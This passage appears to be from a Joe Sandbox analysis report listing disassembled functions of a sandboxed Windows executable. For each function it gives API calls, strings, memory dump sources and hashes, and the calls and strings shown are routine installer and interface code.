                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                                                            • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                                                            • API String ID: 828529508-2866557904
                                                                                                                            • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                                                            • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                                                                            • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                                                            • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00457FF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                                                            • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                                                            • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                                                            • API String ID: 2573145106-3235461205
                                                                                                                            • Opcode ID: 0165f3f1031fc1aa6e60b3a9799ba1014783226e14f241c311df118ccfede771
                                                                                                                            • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                                                            • Opcode Fuzzy Hash: 0165f3f1031fc1aa6e60b3a9799ba1014783226e14f241c311df118ccfede771
                                                                                                                            • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042E9AC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                                                            • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                                                            • API String ID: 3478007392-2498399450
                                                                                                                            • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                                            • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                                                            • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                                            • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00477B94 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                                            • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                                            • API String ID: 1782028327-3855017861
                                                                                                                            • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                                            • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                                                            • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                                            • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00416C2C Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                                                            • SaveDC.GDI32(?), ref: 00416C83
                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                                                            • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                                                            • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3808407030-0
                                                                                                                            • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                                            • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                                                            • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                                            • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00414800 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                                            • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                                                            • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                                            • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004297CC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                                                            • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                                                            • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                                                            • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                                            • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                                                            • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                                            • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041BBB8 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                                                            • GetDC.USER32(00000000), ref: 0041BC12
                                                                                                                            • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1095203571-0
                                                                                                                            • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                                            • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                                                            • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                                            • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004735D8 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                                                            Strings
                                                                                                                            • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                                                            • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                                                            • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                                            • API String ID: 1452528299-4018462623
                                                                                                                            • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                                            • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                                                            • Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                                            • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 262959230-0
                                                                                                                            • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                                                            • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                                                            • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                                                            • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004143E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                                                                            • RealizePalette.GDI32(00000000), ref: 00414421
                                                                                                                            • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                                                                            • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Palette$RealizeSelect$Release
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2261976640-0
                                                                                                                            • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                                                            • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                                                                            • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                                                            • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00424CE0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                                                              • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                                                              • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                                                              • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                                                                            • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                                                              • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                                                              • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                                                              • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                                                              • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                                                            • String ID: vLB
                                                                                                                            • API String ID: 1477829881-1797516613
                                                                                                                            • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                                                            • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                                                            • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                                                            • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406FA4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                                                                            • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                                                                            • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Enum$NameOpenResourceUniversal
                                                                                                                            • String ID: Z
                                                                                                                            • API String ID: 3604996873-1505515367
                                                                                                                            • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                                                            • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                                                                            • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                                                            • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

